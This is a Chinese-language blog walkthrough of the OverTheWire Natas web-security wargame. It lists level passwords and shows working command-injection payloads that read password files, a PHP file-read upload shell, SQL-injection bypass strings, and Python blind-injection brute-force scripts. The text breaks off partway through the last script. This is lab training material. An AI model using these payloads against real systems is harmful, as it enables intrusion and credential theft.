<!doctype html>



  


<html class="theme-next mist use-motion">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />












  
  
  <link href="/vendors/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/vendors/font-awesome/css/font-awesome.min.css?v=4.4.0" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.0.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="web-security," />








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.0.1" />






<meta name="description" content="level 0直接鼠标右键查看源代码即可。flag：gtVrDuiDfck831PqWsLEZy5gyDz1clto   level 0 -&amp;gt; level 1由于鼠标右键被禁止，用CTRL + U(或者F12在控制台查看源代码)即可。flag：ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi   level 1 -&amp;gt; level 2CTRL + U查看源代码发现文件 “">
<meta name="keywords" content="web-security">
<meta property="og:type" content="article">
<meta property="og:title" content="overthewire natas 攻略">
<meta property="og:url" content="http://benjamin.place/2017/08/21/overthewire-natas-攻略/index.html">
<meta property="og:site_name" content="Benjamin&#39;s blog">
<meta property="og:description" content="level 0直接鼠标右键查看源代码即可。flag：gtVrDuiDfck831PqWsLEZy5gyDz1clto   level 0 -&amp;gt; level 1由于鼠标右键被禁止，用CTRL + U(或者F12在控制台查看源代码)即可。flag：ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi   level 1 -&amp;gt; level 2CTRL + U查看源代码发现文件 “">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://benjamin.place/images/natas12.png">
<meta property="og:updated_time" content="2017-09-07T13:39:17.670Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="overthewire natas 攻略">
<meta name="twitter:description" content="level 0直接鼠标右键查看源代码即可。flag：gtVrDuiDfck831PqWsLEZy5gyDz1clto   level 0 -&amp;gt; level 1由于鼠标右键被禁止，用CTRL + U(或者F12在控制台查看源代码)即可。flag：ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi   level 1 -&amp;gt; level 2CTRL + U查看源代码发现文件 “">
<meta name="twitter:image" content="http://benjamin.place/images/natas12.png">



<script type="text/javascript" id="hexo.configuration">
  var NexT = window.NexT || {};
  var CONFIG = {
    scheme: 'Mist',
    sidebar: {"position":"left","display":"always"},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: 0,
      author: '博主'
    }
  };
</script>

  <title> overthewire natas 攻略 | Benjamin's blog </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  










  
  
    
  

  <div class="container one-collumn sidebar-position-left page-post-detail ">
    <div class="headband"></div>
	<a href="https://github.com/echo-1900"><img style="position: absolute; top: 0; right: 0; border: 0;" src="https://camo.githubusercontent.com/52760788cde945287fbb584134c4cbc2bc36f904/68747470733a2f2f73332e616d617a6f6e6177732e636f6d2f6769746875622f726962626f6e732f666f726b6d655f72696768745f77686974655f6666666666662e706e67" alt="Fork me on GitHub" data-canonical-src="https://s3.amazonaws.com/github/ribbons/forkme_right_white_ffffff.png"></a>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-meta ">
  

  <div class="custom-logo-site-title">
    <a href="/"  class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <span class="site-title">Benjamin's blog</span>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>
  <p class="site-subtitle"></p>
</div>

<div class="site-nav-toggle">
  <button>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
  </button>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="#" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup">
 <span class="search-icon fa fa-search"></span>
 <input type="text" id="local-search-input">
 <div id="local-search-result"></div>
 <span class="popup-btn-close">close</span>
</div>


    </div>
  
</nav>

 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  
  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                overthewire natas 攻略
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            <span class="post-meta-item-icon">
              <i class="fa fa-calendar-o"></i>
            </span>
            <span class="post-meta-item-text">发表于</span>
            <time itemprop="dateCreated" datetime="2017-08-21T21:45:31+08:00" content="2017-08-21">
              2017-08-21
            </time>
          </span>

          
            <span class="post-category" >
              &nbsp; | &nbsp;
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
              
                <span itemprop="about" itemscope itemtype="https://schema.org/Thing">
                  <a href="/categories/Overthewire/" itemprop="url" rel="index">
                    <span itemprop="name">Overthewire</span>
                  </a>
                </span>

                
                

              
            </span>
          

          
            
          

          

          
          

          
        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <h3 id="level_0"><a href="#level_0" class="headerlink" title="level 0"></a>level 0</h3><p>直接鼠标右键查看源代码即可。<br><strong>flag：gtVrDuiDfck831PqWsLEZy5gyDz1clto</strong>  </p>
<h3 id="level_0_-_26gt_3B_level_1"><a href="#level_0_-_26gt_3B_level_1" class="headerlink" title="level 0 -&gt; level 1"></a>level 0 -&gt; level 1</h3><p>由于鼠标右键被禁止，用<code>CTRL + U</code>(或者F12在控制台查看源代码)即可。<br><strong>flag：ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi</strong>  </p>
<h3 id="level_1_-_26gt_3B_level_2"><a href="#level_1_-_26gt_3B_level_2" class="headerlink" title="level 1 -&gt; level 2"></a>level 1 -&gt; level 2</h3><p><code>CTRL + U</code>查看源代码发现文件 “files/pixel.png”，于是尝试访问<a href="http://natas2.natas.labs.overthewire.org/files/" target="_blank" rel="external">files文档</a>，发现users.txt，打开即可。<br><strong>flag：sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14</strong>  </p>
<h3 id="level_2_-_26gt_3B_level_3"><a href="#level_2_-_26gt_3B_level_3" class="headerlink" title="level 2 -&gt; level 3"></a>level 2 -&gt; level 3</h3><p>查看源代码后由提示”Not even Google will find it this time”猜测可能是有’robots.txt’(也可扫后台来找)，于是访问”/robots.txt”，发现有文档”/s3cr3t/“禁止搜索引擎爬取，于是访问之，再打开”users.txt”即可。<br><strong>flag：Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ</strong>  </p>
<h3 id="level_3_-_26gt_3B_level_4"><a href="#level_3_-_26gt_3B_level_4" class="headerlink" title="level 3 -&gt; level 4"></a>level 3 -&gt; level 4</h3><p>根据提示可得我们可以知道要想访问该页面内容需使<a href="http://www.fwolf.com/blog/post/320" target="_blank" rel="external">referer</a>的值为“natas5.natas.labs.overthewire.org”， 因而使用burpsuite抓包后修改referer即可。<br><strong>flag：iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq</strong>  </p>
<h3 id="level_4_-_26gt_3B_level_5"><a href="#level_4_-_26gt_3B_level_5" class="headerlink" title="level 4 -&gt; level 5"></a>level 4 -&gt; level 5</h3><p>同样是burpsuite抓包，发现cookie中有关键字<code>loggedin</code>的值为0，将其改为1后刷新界面<br>即可。<br><strong>flag：aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1</strong>  </p>
<h3 id="level_5_-_26gt_3B_level_6"><a href="#level_5_-_26gt_3B_level_6" class="headerlink" title="level 5 -&gt; level 6"></a>level 5 -&gt; level 6</h3><p>查看源码后直接发现文档<code>includes/secret.inc</code>以及密码验证函数，于是访问”includes/secret.inc”并发现secret的值，返回提交界面提交即可。<br><strong>flag：7z3hEENjQtflzgnT29q7wAvMNfZdh0i9</strong>  </p>
<h3 id="level_6_-_26gt_3B_level_7"><a href="#level_6_-_26gt_3B_level_7" class="headerlink" title="level 6 -&gt; level 7"></a>level 6 -&gt; level 7</h3><p>查看源码后发现提示<code>password for webuser natas8 is in /etc/natas_webpass/natas8</code>， 于是将该目录作为<code>page</code>的值提交即可。<br><strong>flag：DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe</strong><br>附：<a href="https://www.secpulse.com/archives/55769.html" target="_blank" rel="external">本地文件包含漏洞(LFI)的利用</a>  </p>
<h3 id="level_7_-_26gt_3B_level_8"><a href="#level_7_-_26gt_3B_level_8" class="headerlink" title="level 7 -&gt; level 8"></a>level 7 -&gt; level 8</h3><p>查看源代码后发现验证方式是将所提交字符串经过几次转换后与一个已知的字符串进行比对，且转换都可逆，于是一行php搞定。  </p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line"><span class="keyword">echo</span> base64_decode(strrev(hex2bin(<span class="string">'3d3d516343746d4d6d6c315669563362'</span>)));</div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure>
<p>得到字符串<code>oubWYf2kBq</code>,提交即可。<br><strong>flag：W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl</strong><br>附：<a href="http://php.net/manual/zh/function.hex2bin.php" target="_blank" rel="external">php hex2bin函数</a>  </p>
<h3 id="level_8_-_26gt_3B_level_9"><a href="#level_8_-_26gt_3B_level_9" class="headerlink" title="level 8 -&gt; level 9"></a>level 8 -&gt; level 9</h3><p>这是一个搜索框，查看源代码后发现服务器首先会检查url中<code>needle</code>(即待检索值)的值是否为空，如果不为空，则将其赋给变量<code>key</code>，再执行<code>grep -i $key dictionary.txt</code>，这儿没有任何的过滤且由先前已知没关的密码都存于”/etc/natas_webpass/“文件夹中，因而我们可构造待查询值为<code>; cat /etc/natas_webpass/natas10 ;</code>，此时服务器端查询语句则变为<code>grep -i ; cat /etc/natas_webpass/natas10 ; dictionary.txt</code>，即执行了三条命令，其中第二条命令会返回密码。<br><strong>flag：nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu</strong><br>附：<a href="http://php.net/manual/zh/function.passthru.php" target="_blank" rel="external">php passthru函数</a>  </p>
<h3 id="level_9_-_26gt_3B_level_10"><a href="#level_9_-_26gt_3B_level_10" class="headerlink" title="level 9 -&gt; level 10"></a>level 9 -&gt; level 10</h3><p>此关较上一关而言多了一个过滤函数，即提交的查询值中不能出现<code>; | &amp;</code>中的任意一个。于是考虑使用通配符 <code>*</code> 来进行文件的全部查询，即提交<code>.* /etc/natas_webpass/natas11</code>，则查询语句变为<code>grep -i .* /etc/natas_webpass/natas11 dictionary.txt</code>，此时返回”/etc/natas_webpass/natas11”目录下的所有文件以及”dictionary.txt”中的所有内容。<br><strong>flag：U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK</strong><br>附：<a href="http://php.net/manual/zh/function.preg-match.php" target="_blank" rel="external">php preg_match函数</a>  </p>
<h3 id="level_10_-_26gt_3B_level_11"><a href="#level_10_-_26gt_3B_level_11" class="headerlink" title="level 10 -&gt; level 11"></a>level 10 -&gt; level 11</h3><p>这一关就是一个异或运算，主要就是要知道异或运算的一个性质：  </p>
<blockquote>
<p>A ^ B = C<br>A ^ C = B<br>B ^ C = A  </p>
</blockquote>
<p>以上三个等式中只要有一个成立，其余两个必定也成立。  </p>
<p>而在这关当中我们通过阅读源代码发现在cookie中应该会有一个名为’data’的值，且其base64解码后的字符串应该为异或运算中三个元素中的一个。而由源代码中的<br><code>$defaultdata = array( &quot;showpassword&quot;=&gt;&quot;no&quot;, &quot;bgcolor&quot;=&gt;&quot;#ffffff&quot;);</code><br>和 <code>$data = loadData($defaultdata);</code>可知：<br><code>array( &quot;showpassword&quot;=&gt;&quot;no&quot;, &quot;bgcolor&quot;=&gt;&quot;#ffffff&quot;)</code>为异或运算中的第二个元素。由此我们便可通过异或运算解除第三个元素，及加密所用密钥(源代码中的’$key’)，于是改写代码如下：  </p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line">	<span class="function"><span class="keyword">function</span> <span class="title">xor_encrypt</span><span class="params">($in)</span> </span>&#123;</div><div class="line">   	$no=json_encode(<span class="keyword">array</span>( <span class="string">"showpassword"</span>=&gt;<span class="string">"no"</span>, <span class="string">"bgcolor"</span>=&gt;<span class="string">"#ffffff"</span>));</div><div class="line">  		$key = $no;</div><div class="line">   	$text = $in;</div><div class="line">   	$outText = <span class="string">''</span>;</div><div class="line"></div><div class="line">    <span class="comment">// Iterate through each character</span></div><div class="line">  		<span class="keyword">for</span>($i=<span class="number">0</span>;$i&lt;strlen($text);$i++) &#123;</div><div class="line">   		$outText .= $text[$i] ^ $key[$i % strlen($key)];</div><div class="line">   	&#125;</div><div class="line"></div><div class="line">   	<span class="keyword">return</span> $outText;</div><div class="line">&#125;</div><div class="line">$cookie=base64_decode(<span class="string">'ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw'</span>);</div><div class="line">$key=xor_encrypt($cookie);</div><div class="line"><span class="keyword">echo</span> $key;</div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure>
<p>其中cookie中data的值由BP抓包所得，运行以上脚本后得到密钥为 <code>qw8J</code>，于是继续再根据源码中的<br><code>if($data[&quot;showpassword&quot;] == &quot;yes&quot;) {print &quot;The password for natas12 is &lt;censored&gt;&lt;br&gt;&quot;;}</code>，编写脚本如下：  </p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line"><span class="function"><span class="keyword">function</span> <span class="title">xor_encrypt</span><span class="params">($in)</span> </span>&#123;</div><div class="line">   	$key = <span class="string">'qw8J'</span>;</div><div class="line">  	 	$text = $in;</div><div class="line">   	$outText = <span class="string">''</span>;</div><div class="line"></div><div class="line">   	<span class="comment">// Iterate through each character</span></div><div class="line">   	<span class="keyword">for</span>($i=<span class="number">0</span>;$i&lt;strlen($text);$i++) &#123;</div><div class="line">   	$outText .= $text[$i] ^ $key[$i % strlen($key)];</div><div class="line">   &#125;</div><div class="line"></div><div class="line">   <span class="keyword">return</span> $outText;</div><div class="line">&#125;</div><div class="line"></div><div class="line">$yes=json_encode(<span class="keyword">array</span>( <span class="string">"showpassword"</span>=&gt;<span class="string">"yes"</span>, <span class="string">"bgcolor"</span>=&gt;<span class="string">"#ffffff"</span>));</div><div class="line">$newCookie=base64_encode(xor_encrypt($yes));</div><div class="line"><span class="keyword">echo</span> $newCookie;</div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure>
<p>于是得到新的cookie，用新cookie替换原cookie中的data的值，然后提交即可。<br><strong>flag：EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3</strong>  </p>
<h3 id="level_11_-_26gt_3B_level_12"><a href="#level_11_-_26gt_3B_level_12" class="headerlink" title="level 11 -&gt; level 12"></a>level 11 -&gt; level 12</h3><p>由于本题中对所上传的文件没有进行任何的安全检查，于是我们编写一下脚本并上传：  </p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line"><span class="comment">#!/usr/bin/php</span></div><div class="line"><span class="meta">&lt;?php</span></div><div class="line">readfile(<span class="string">'/etc/natas_webpass/natas13'</span>);</div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure>
<p>不妨将脚本保存为’test.php’，但是上传后发现文件后缀会被默认修改为<code>.jpg</code>，于是用BP抓包分析，内容如下<br><img src="/images/natas12.png" width="50%" height="50%" align="center/"><br>本想着用<code>%00</code>截断，但是这里只需直接将<code>.jpg</code>改为<code>.php</code>提交即可。<br><strong>flag：jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY</strong>  </p>
<h3 id="level_12_-_26gt_3B_level_13"><a href="#level_12_-_26gt_3B_level_13" class="headerlink" title="level 12 -&gt; level 13"></a>level 12 -&gt; level 13</h3><p>这一关较上一关就只增加了一个 <code>exif_imagetype</code>函数来检查上传文件的类型， 而<a href="http://php.net/manual/zh/function.exif-imagetype.php" target="_blank" rel="external">exif_imagetype</a>函数的检查机制为”读取文件的第一个字节并检查其签名”，于是为了达到欺骗目的，我们只需在上一关脚本的基础上用二进制文本编辑器在脚本头部加上JPG文件的<a href="https://baike.baidu.com/item/%E6%96%87%E4%BB%B6%E5%A4%B4" target="_blank" rel="external">文件头</a>，即<code>FF D8 FF</code>，之后上传并抓包修改即可。<br><strong>flag：Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1</strong>  </p>
<h3 id="level_13_-_26gt_3B_level_14"><a href="#level_13_-_26gt_3B_level_14" class="headerlink" title="level 13 -&gt; level 14"></a>level 13 -&gt; level 14</h3><p>就是一个简单的sql注入，由于查询语句已经给出，因此直接用 <code>&quot;</code> 闭合username即可。<br>用户名和密码都输入 <code>&quot; or &quot;1&quot;=&quot;1</code> ，则此时查询语句变为<code>select * from users where username =&quot;&quot; or &quot;1&quot;=&quot;1&quot; and password=&quot;&quot; or &quot;1&quot;=&quot;1&quot;</code> ， 又由于 <code>&quot;1&quot;=&quot;1&quot;</code> 恒成立，因而绕过了登录。<br><strong>flag：    AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J</strong>  </p>
<h3 id="level_14_-_26gt_3B_level_15"><a href="#level_14_-_26gt_3B_level_15" class="headerlink" title="level 14 -&gt; level 15"></a>level 14 -&gt; level 15</h3><p>首先查看源代码发现其中有提示说数据库中创建了username和password两个字段,然后再结合给出的是一个查询框且查询语句已经给出，即   <code>$query = &quot;SELECT * from users where username=\&quot;&quot;.$_REQUEST[&quot;username&quot;].&quot;\&quot;&quot;;</code>， 于是先随便输入几个试试，发现都是返回“This user doesn’t exist”，再想到我们要获取的是natas16的密码，输入’natas16’试试，发现返回“This user exists.”，此时语句为‘SELECT * from users where username=”natas16”’，但是由于此处没有进行严格的输入检查，所以我们可以试试查询<code>natas16&quot;</code>，即加一个<code>&quot;</code>，发现报错，于是尝试用MYSQL中通配符<code>%</code>来爆破出password的值，在这里我们可以选用<a href="http://www.5idev.com/p-php_mysql_like.shtml" target="_blank" rel="external">LIKE BINARY语句</a>，再结合之前所有关卡的密码长度都是32个字符且包含大小写字母和数字，于是我们可以编写脚本来实施爆破，此处选用python。为了提高效率，脚本的大体思路是先筛选出密码中所包含的字符，再用这些字符来在每一个密码位挨个尝试，脚本如下(为了代码简洁这里就选用<a href="http://docs.python-requests.org/en/latest/user/quickstart/#make-a-request" target="_blank" rel="external">requests模块</a>)：  </p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">import</span> string</div><div class="line"><span class="keyword">import</span> requests</div><div class="line"></div><div class="line">char = string.letters + string.digits</div><div class="line">url = <span class="string">"http://natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J@natas15.natas.labs.overthewire.org/"</span></div><div class="line">exits_str = <span class="string">"This user exists."</span></div><div class="line">lettersin = <span class="string">''</span></div><div class="line">passwd = <span class="string">''</span></div><div class="line">r = requests.get(url)</div><div class="line"></div><div class="line"><span class="keyword">if</span> r.status_code != requests.codes.ok:</div><div class="line">    <span class="keyword">raise</span> ValueError(<span class="string">"Fail to connect."</span>)</div><div class="line"></div><div class="line"><span class="keyword">for</span> c <span class="keyword">in</span> char:</div><div class="line">    target = url + <span class="string">'?username=natas16" AND password LIKE BINARY "%'</span> + c + <span class="string">'%" "'</span></div><div class="line">    response = requests.get(target)</div><div class="line">    <span class="keyword">if</span> response.content.find(exits_str) != <span class="number">-1</span>:</div><div class="line">        lettersin += c</div><div class="line">        <span class="keyword">print</span> <span class="string">"Used chars: "</span> + lettersin</div><div class="line"></div><div class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">32</span>):</div><div class="line">    <span class="keyword">for</span> c <span class="keyword">in</span> lettersin:</div><div class="line">        target = url + <span class="string">'?username=natas16" AND password LIKE BINARY "'</span> + passwd + c + <span class="string">'%" "'</span></div><div class="line">        response = requests.get(target)</div><div class="line">        <span class="keyword">if</span> response.content.find(exits_str) != <span class="number">-1</span>:</div><div class="line">            passwd += c</div><div class="line">            <span class="keyword">print</span> <span class="string">"Password: "</span> + passwd + <span class="string">'*'</span> * int(<span class="number">32</span> - len(passwd))</div><div class="line">            <span class="keyword">break</span></div><div class="line"></div><div class="line"><span class="keyword">print</span> <span class="string">"Done!"</span></div></pre></td></tr></table></figure>
<p><strong>flag:WaIHEacj63wnNIBROHeqi3p9t0m5nhmh</strong>  </p>
<h3 id="level_15_-_26gt_3B_level_16"><a href="#level_15_-_26gt_3B_level_16" class="headerlink" title="level 15 -&gt; level 16"></a>level 15 -&gt; level 16</h3><p>这一关算是natas10和上一关的结合加强版，首先其查询代码是 <code>passthru(&quot;grep -i \&quot;$key\&quot; dictionary.txt&quot;)</code>，相比较于natas，此处将输入的key用两个<code>&quot;</code>封装了起来，所以在这里输入 <code>.* /etc/natas_webpass/natas17</code>是无效的，只是相当于在dictionary.txt中查询所输入的字符串，显然返回为空。既然如此，不妨输入一个字符’a’看看，发现返回了dictionary.txt中所有含有’a’字母的字符串，且大小写不敏感。我们在其中任意找一个相对较长的单词(避免其他单词中包含了这个单词，比如’Africa’就包含于’African’)，这里不妨就选择African，为了确保它不包含于其他单词，可再次回到初始界面输入’African’，发现只返回这一个值，于是确定选这个词不会出错。<br>在选出这个<strong>唯一的且不包含于其它单词的</strong>词后再来解释一下为什么要这么选，因为在bash中有一种手段叫<a href="http://www.tldp.org/LDP/abs/html/commandsub.html" target="_blank" rel="external">命令替代(command substitution)</a>，它相当于开启了一个<strong>subshell</strong>，即先将命令替代中的语句执行以后再将该语句的返回值返回到原语句，并结合原语句中的后续命令一同执行(具体用法可参考上面的文档链接)。有两种方式可执行命令替代：  </p>
<ul>
<li>将命令用反引号” ` “进行封装</li>
<li>将命令用 <code>$()</code> 进行封装</li>
</ul>
<p>由于已知此关中反引号已经被过滤，于是我们选择用<code>$()</code>进行命令替换。类似上一关的思路，我们要做的就是<strong>每次查询一个字符，看它是否存在于natas17的密码中，如果存在，它将与之前选中的 “African” 来构成一个新字符并在”dictionary.txt”中进行查询，而由于African的唯一性即不包含于其他单词的性质，我们可以肯定此次查询的结果为空</strong>。于是简化中间步骤后就是，<strong>“每次查询一个字符，如果密码中有它，返回值为空”</strong>。  </p>
<p>于是编写脚本如下：  </p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">import</span> string</div><div class="line"><span class="keyword">import</span> requests</div><div class="line"></div><div class="line"></div><div class="line"><span class="comment">#   a new string  in the form of</span></div><div class="line"><span class="comment">#+   "'the string we made' + 'the unique word</span></div><div class="line"><span class="comment">#+     we choose from the normal respoense content'" will</span></div><div class="line"><span class="comment">#+      be made. Since this string certainly does't exist, so</span></div><div class="line"><span class="comment">#+       when the server response nothing, we can be sure that</span></div><div class="line"><span class="comment">#+         the password contains the string we made.</span></div><div class="line"></div><div class="line"></div><div class="line">char = string.letters + string.digits</div><div class="line">url = <span class="string">"http://natas16:WaIHEacj63wnNIBROHeqi3p9t0m5nhmh@natas16.natas.labs.overthewire.org/"</span></div><div class="line">lettersin = <span class="string">""</span></div><div class="line">passwd = <span class="string">""</span></div><div class="line">exist_str = <span class="string">"Output:\n&lt;pre&gt;\n&lt;/pre&gt;"</span></div><div class="line"></div><div class="line"><span class="comment">#connect return</span></div><div class="line">con_ret = requests.get(url)</div><div class="line"></div><div class="line"><span class="keyword">if</span> con_ret.status_code != requests.codes.ok:</div><div class="line">    <span class="keyword">raise</span> ValueError(<span class="string">"Fail to connect."</span>)</div><div class="line"></div><div class="line"><span class="keyword">for</span> c <span class="keyword">in</span> char:</div><div class="line">    target = url + <span class="string">"?needle=$(grep "</span> + c + <span class="string">" /etc/natas_webpass/natas17)Africans"</span></div><div class="line">    respoense = requests.get(target)</div><div class="line">    <span class="keyword">if</span> respoense.content.find(exist_str) != <span class="number">-1</span>:</div><div class="line">    <span class="comment">#it means that the respoense's content contains the exist_str</span></div><div class="line">        lettersin += c</div><div class="line">        <span class="keyword">print</span> lettersin</div><div class="line"></div><div class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">32</span>):</div><div class="line">    <span class="keyword">for</span> c <span class="keyword">in</span> lettersin:</div><div class="line">        target = url + <span class="string">"?needle=$(grep ^"</span> + passwd + c + <span class="string">" /etc/natas_webpass/natas17)Africans"</span></div><div class="line">        <span class="comment">#  [!!!]  ^ is a must</span></div><div class="line">        respoense = requests.get(target)</div><div class="line">        <span class="keyword">if</span> respoense.content.find(exist_str) != <span class="number">-1</span>:</div><div class="line">            passwd += c</div><div class="line">            <span class="keyword">print</span> passwd + <span class="string">'*'</span> * int(<span class="number">32</span> - len(passwd))</div><div class="line">            <span class="keyword">break</span></div></pre></td></tr></table></figure>
<p><strong>flag:8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw</strong>  </p>
<h3 id="level_16_-_26gt_3B_level_17"><a href="#level_16_-_26gt_3B_level_17" class="headerlink" title="level 16 -&gt; level 17"></a>level 16 -&gt; level 17</h3><p>这一关算得上是natas15的加强版，可以看到后台代码与natas15的几乎是一模一样，但是仔细审阅代码可以发现，natas15中查询时所有可能的返回的语句在这里全被注释了，<strong>但是请注意，在这里这些返回值虽然被注释了，但是查询语句是执行了的</strong>，于是我们可以联想到 <a href="https://www.owasp.org/index.php/Blind_SQL_Injection" target="_blank" rel="external">基于时间的SQL注入</a>，在这里我们就选用 <a href="https://dev.mysql.com/doc/refman/5.7/en/miscellaneous-functions.html#function_sleep" target="_blank" rel="external"> SLEEP</a> 函数。于是编写脚本如下:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">import</span> string</div><div class="line"><span class="keyword">import</span> requests</div><div 